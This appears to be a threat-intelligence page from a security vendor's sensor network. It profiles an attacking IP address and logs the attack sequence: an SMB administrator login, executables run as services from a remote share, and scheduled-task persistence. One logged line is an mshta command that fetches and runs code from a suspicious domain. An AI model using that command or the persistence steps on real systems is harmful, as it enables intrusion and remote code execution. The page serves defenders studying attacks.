IP Address: 79.129.107.213 (Malicious)
This IP address attempted an attack on a machine in our threat sensors network
Role: Attacker, Scanner
Services Targeted: MSSQL, SMB
Tags: Successful SMB Login, Service Configuration, MSSQL, Driver Start, Service Stop, SMB, Service Start, Driver Creation, Driver Configuration, Service Creation, File Operation By CMD, Execute from Share, SMB Share Connect, Listening, Scheduled Task Creation, Access Suspicious Domain, Download File, System File Modification, Executable File Modification, CMD, SMB Null Session Login, Service Deletion, DNS Query, Access Share

Associated Attack Servers
IP Address: 79.129.107.213
Domain: -
ISP: OTEnet S.A.
Country: Greece
WHOIS Created Date: -
WHOIS Updated Date: -
Organization: -
First seen in Akamai Guardicore Segmentation: 2020-02-22
Last seen in Akamai Guardicore Segmentation: 2024-06-25
What is Akamai Guardicore Segmentation
Akamai Guardicore Segmentation is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Akamai Guardicore Segmentation generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time.
Incident events (tags in brackets):
A user logged in using SMB with the following username: Administrator - Authentication policy: Correct Password [Successful SMB Login]
C:\ALXYjnkU.exe was downloaded [Download File]
alxyjnku.exe was executed from the remote share \\server-backup\c$ [Execute from Share]
c:\windows\system32\services.exe installed and started \\server-backup\c$\alxyjnku.exe as a service named xtWz under service group None [Service Creation, Service Start]
Service xtWz was stopped [Service Stop]
c:\windows\system32\services.exe installed and started cmd as a service named iQAl under service group None [Service Creation, Service Start]
c:\windows\system32\services.exe installed and started cmd as a service named TJOF under service group None [Service Creation, Service Start]
A user logged in using SMB with the following username: Administrator - Authentication policy: Previously Approved User (4 times) [Successful SMB Login]
C:\xhIlVVhh.exe was downloaded [Download File]
c:\windows\system32\services.exe installed and started system32\drivers\tcpip6.sys as a service named Tcpip6 under service group None [Service Creation, Driver Start]
c:\windows\system32\services.exe installed and started \\server-backup\c$\xhilvvhh.exe as a service named GETy under service group None [Service Creation, Service Start]
xhilvvhh.exe was executed from the remote share \\server-backup\c$ [Execute from Share]
System file C:\WINDOWS\security\Database\secedit.sdb was modified [System File Modification]
c:\windows\system32\services.exe installed and started %systemroot%\system32\6to4svc.dll as a service named 6to4 under service group NetworkService [Service Creation, Service Start]
c:\windows\system32\services.exe installed and started system32\drivers\smb.sys as a service named Smb under service group None [Service Creation, Driver Start]
c:\windows\system32\services.exe installed system32\drivers\tunmp.sys as a service named tunmp under service group None [Service Creation]
C:\VqzPBkQo.exe was downloaded [Download File]
c:\windows\system32\services.exe installed and started \\server-backup\c$\vqzpbkqo.exe as a service named nPPK under service group None [Service Creation, Service Start]
vqzpbkqo.exe was executed from the remote share \\server-backup\c$ [Execute from Share]
Process netsvcs Service Group attempted to access suspicious domains: _LDAP._TCP [Access Suspicious Domain, DNS Query]
nrshcagp.exe was executed from the remote share \\server-backup\c$ [Execute from Share]
c:\windows\system32\services.exe installed and started \\server-backup\c$\nrshcagp.exe as a service named WJvc under service group None [Service Creation, Service Start]
Executable file \\SERVER-BACKUP\C$\VqzPBkQo.exe was modified [Executable File Modification]
Process NetworkService Service Group started listening on ports: 65531, 65532 and 65533 [Listening]
Service WJvc was stopped [Service Stop]
The command line C:\WINDOWS\system32\cmd.exe /c mshta http://w.beahh.com/page.html?pSERVER-BACKUP was scheduled to run by modifying C:\WINDOWS\Tasks\Autocheck.job
C:\pwCpulNG.exe was downloaded [Download File]
The command line c:\windows\gAEneai.exe was scheduled to run by modifying C:\WINDOWS\Tasks\taXMV.job
c:\windows\system32\services.exe installed and started \\server-backup\c$\pwcpulng.exe as a service named rqbN under service group None [Service Creation, Service Start]
The command line c:\windows\temp\installed.exe was scheduled to run by modifying C:\WINDOWS\Tasks\Autoload.job
pwcpulng.exe was executed from the remote share \\server-backup\c$ [Execute from Share]
Process c:\windows\system32\mshta.exe attempted to access suspicious domains: w.beahh.com [Access Suspicious Domain, DNS Query]
Service rqbN was stopped [Service Stop]
Service nPPK was stopped [Service Stop]
Connection was closed due to timeout
File: C:\AAORXOdL.exe
SHA256: 3c2fe308c0a563e06263bbacf793bbe9b2259d795fcc36b953793a7e499e7f71
Size: 56320 bytes